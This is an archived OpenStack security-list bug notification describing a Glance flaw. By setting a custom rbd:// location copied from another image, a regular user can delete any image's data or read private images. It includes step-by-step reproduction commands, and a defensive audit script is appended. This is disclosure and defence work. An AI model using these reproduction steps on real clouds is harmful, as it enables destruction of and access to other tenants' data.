[Openstack-security] [Bug 1546507] Re: Regular user in non-default non-recommended configuration can delete any image file
Jeremy Stanley
fungi at yuggoth.org
Thu Aug 29 19:57:29 UTC 2019
** Description changed:
- This issue is being treated as a potential security risk under embargo.
- Please do not make any public mention of embargoed (private) security
- vulnerabilities before their coordinated publication by the OpenStack
- Vulnerability Management Team in the form of an official OpenStack
- Security Advisory. This includes discussion of the bug or associated
- fixes in public forums such as mailing lists, code review systems and
- bug trackers. Please also avoid private disclosure to other individuals
- not already approved for access to this information, and provide this
- same reminder to those who are made aware of the issue prior to
- publication. All discussion should remain confined to this private bug
- report, and any proposed fixes should be added to the bug as
- attachments.
-
Any user can delete any public image data or get access to a private image
just by knowing the image id.
Glance allows adding a custom location to an image and this behavior is
really harmful.
Scenario of deleting image data in Ceph backend with current devstack
configuration
1. User gets list of images:
mfedosin@winter ~ $ glance image-list
+--------------------------------------+----------------------------+
| ID | Name |
+--------------------------------------+----------------------------+
| 0741cbc7-6b9f-4eb4-a666-9743a186849e | debian-8-m-agent.qcow2 |
| 2e4b6dca-9700-4715-b81d-4463cd7038de | TestVM |
| 39599dd3-35cb-4893-b5d4-1a17e23e538a | ubuntu14.04-x64-docker |
| 153397f8-d5e5-43d1-9a08-5fc52bda11a4 | ubuntu14.04-x64-kubernetes |
+--------------------------------------+----------------------------+
2. User requests info about public image he wants to delete:
mfedosin@winter ~ $ glance image-show 2e4b6dca-9700-4715-b81d-4463cd7038de
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | ee1eca47dc88f4879d8a229cc70a07c6 |
| container_format | bare |
| created_at | 2016-02-11T03:38:09Z |
| direct_url | rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d- |
| | 4463cd7038de/snap |
| disk_format | qcow2 |
| id | 2e4b6dca-9700-4715-b81d-4463cd7038de |
| min_disk | 0 |
| min_ram | 64 |
| name | TestVM |
| owner | 1c6cea59a6054372b10acbab8e25e415 |
| protected | False |
| size | 13287936 |
| status | active |
| tags | [] |
| updated_at | 2016-02-11T03:38:30Z |
| virtual_size | None |
| visibility | public |
+------------------+----------------------------------------------------------------------------------+
Optional: User may try to download image file with
"glance image-download 2e4b6dca-9700-4715-b81d-4463cd7038de --file gg"
3. User copies direct image url: from 'direct_url' or 'locations' field
rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap
4. User creates new image instance in db and sets custom location with "glance --os-image-api-version 1 image-create --location" (v1) or "glance location-add --url" (v2)
mfedosin@winter ~ $ glance --os-image-api-version 1 image-create --location "rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap" --disk-format qcow2 --container-format bare --name rerere
+------------------+--------------------------------------+
| Property | Value |
+------------------+--------------------------------------+
| checksum | None |
| container_format | bare |
| created_at | 2016-02-17T11:54:41.000000 |
| deleted | False |
| deleted_at | None |
| disk_format | qcow2 |
| id | b12c6965-c6f8-4272-a8a0-453fc0fc03e2 |
| is_public | False |
| min_disk | 0 |
| min_ram | 0 |
| name | rerere |
| owner | fa343a042d2b47cbbeab08cca9913679 |
| protected | False |
| size | 13287936 |
| status | active |
| updated_at | 2016-02-17T11:54:44.000000 |
| virtual_size | None |
+------------------+--------------------------------------+
Optional: User may try to verify that image has desired location
mfedosin@winter ~ $ glance image-show b12c6965-c6f8-4272-a8a0-453fc0fc03e2
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | None |
| container_format | bare |
| created_at | 2016-02-17T11:54:41Z |
| direct_url | rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d- |
| | 4463cd7038de/snap |
| disk_format | qcow2 |
| id | b12c6965-c6f8-4272-a8a0-453fc0fc03e2 |
| min_disk | 0 |
| min_ram | 0 |
| name | rerere |
| owner | fa343a042d2b47cbbeab08cca9913679 |
| protected | False |
| size | 13287936 |
| status | active |
| tags | [] |
| updated_at | 2016-02-17T11:54:44Z |
| virtual_size | None |
| visibility | private |
+------------------+----------------------------------------------------------------------------------+
5. User deletes his image. Image data will be deleted too.
glance image-delete b12c6965-c6f8-4272-a8a0-453fc0fc03e2
mfedosin@winter ~ $ glance image-delete b12c6965-c6f8-4272-a8a0-453fc0fc03e2
mfedosin@winter ~ $ glance image-show b12c6965-c6f8-4272-a8a0-453fc0fc03e2
404 Not Found: No image found with ID b12c6965-c6f8-4272-a8a0-453fc0fc03e2 (HTTP 404)
6. Trying to access public data will fail after that.
mfedosin@winter ~ $ glance --debug image-download 2e4b6dca-9700-4715-b81d-4463cd7038de --file ggg
curl -g -i -X GET -H 'Accept-Encoding: gzip, deflate' -H 'Accept: */*' -H 'User-Agent: python-glanceclient' -H 'Connection: keep-alive' -H 'X-Auth-Token: {SHA1}49eea3cf13d0aba2b76665245eab8cc45fb08342' -H 'Content-Type: application/octet-stream' http://192.168.0.2:9292/v2/images/2e4b6dca-9700-4715-b81d-4463cd7038de/file
HTTP/1.1 204 No Content
Date: Wed, 17 Feb 2016 12:01:54 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0
X-Openstack-Request-Id: req-d77148fb-fd4b-4f7b-a646-30f494c480dd
Traceback (most recent call last):
File "/usr/local/lib/python2.7/dist-packages/glanceclient/shell.py", line 605, in main
args.func(client, args)
File "/usr/local/lib/python2.7/dist-packages/glanceclient/v2/shell.py", line 281, in do_image_download
utils.save_image(body, args.file)
File "/usr/local/lib/python2.7/dist-packages/glanceclient/common/utils.py", line 305, in save_image
for chunk in data:
File "/usr/local/lib/python2.7/dist-packages/glanceclient/common/utils.py", line 478, in __iter__
self.iterable.close()
AttributeError: 'NoneType' object has no attribute 'close'
'NoneType' object has no attribute 'close'
mfedosin@winter ~ $ glance --version
1.2.0
Affected apis:
all v1 api without any chance to fix it - v1 always allows setting custom locations.
v2 api when 'show_multiple_locations' is enabled (default - False)
Affected schemes:
All, except 'swift+config' and 'file', because custom locations are forbidden for them.
If a user knows a private image id, he can build and set a custom location on
his personal image and therefore get access to private data.
--
You received this bug notification because you are a member of OpenStack
Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1546507
Title:
Regular user in non-default non-recommended configuration can delete
any image file
Status in Glance:
Confirmed
Status in Glance liberty series:
Confirmed
Status in Glance mitaka series:
Confirmed
Status in Glance newton series:
Confirmed
Status in Glance ocata series:
Confirmed
Status in OpenStack Security Advisory:
Opinion
Status in OpenStack Security Notes:
New
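Added example, not part of the bug report or of Glance's code: an operator-side audit for the condition the report describes, flagging image records whose rbd:// location names another image's backend object, plus a check of the show_multiple_locations option named under "Affected apis". The record layout (dicts with id, owner, locations), the function names and the config text are assumptions made for this sketch; the ids and URL are taken from the report's output.

```python
# Added example (not Glance code): audit image records for locations that
# reference another image's backend object, the condition in bug 1546507.
import configparser
from urllib.parse import urlparse

def rbd_object_id(url):
    """Image name inside rbd://<fsid>/<pool>/<image>/<snapshot>, else None."""
    parsed = urlparse(url)
    if parsed.scheme != "rbd":
        return None
    parts = [parsed.netloc] + [p for p in parsed.path.split("/") if p]
    return parts[2] if len(parts) == 4 else None

def audit_locations(images):
    """Flag images whose RBD location names a different image id.

    Assumption: the RBD store names each object after the Glance image id,
    as the direct_url in the report shows.
    """
    owners = {img["id"]: img["owner"] for img in images}
    findings = []
    for img in images:
        for url in img["locations"]:
            backing = rbd_object_id(url)
            if backing is None or backing == img["id"]:
                continue
            findings.append({
                "image": img["id"],
                "points_at": backing,
                "cross_owner": owners.get(backing) not in (None, img["owner"]),
            })
    return findings

def multiple_locations_enabled(conf_text):
    """True when glance-api.conf turns on show_multiple_locations (default False)."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(conf_text)
    return cp.getboolean("DEFAULT", "show_multiple_locations", fallback=False)

# Records rebuilt from the report's output; the config text is constructed.
URL = "rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap"
IMAGES = [
    {"id": "2e4b6dca-9700-4715-b81d-4463cd7038de", "owner": "1c6cea59a6054372b10acbab8e25e415", "locations": [URL]},
    {"id": "b12c6965-c6f8-4272-a8a0-453fc0fc03e2", "owner": "fa343a042d2b47cbbeab08cca9913679", "locations": [URL]},
]
CONF = "[DEFAULT]\nshow_multiple_locations = True\n"

if __name__ == "__main__":
    print(audit_locations(IMAGES), multiple_locations_enabled(CONF))
```

A finding with cross_owner set means deleting the flagged image would also remove data that another project's image depends on.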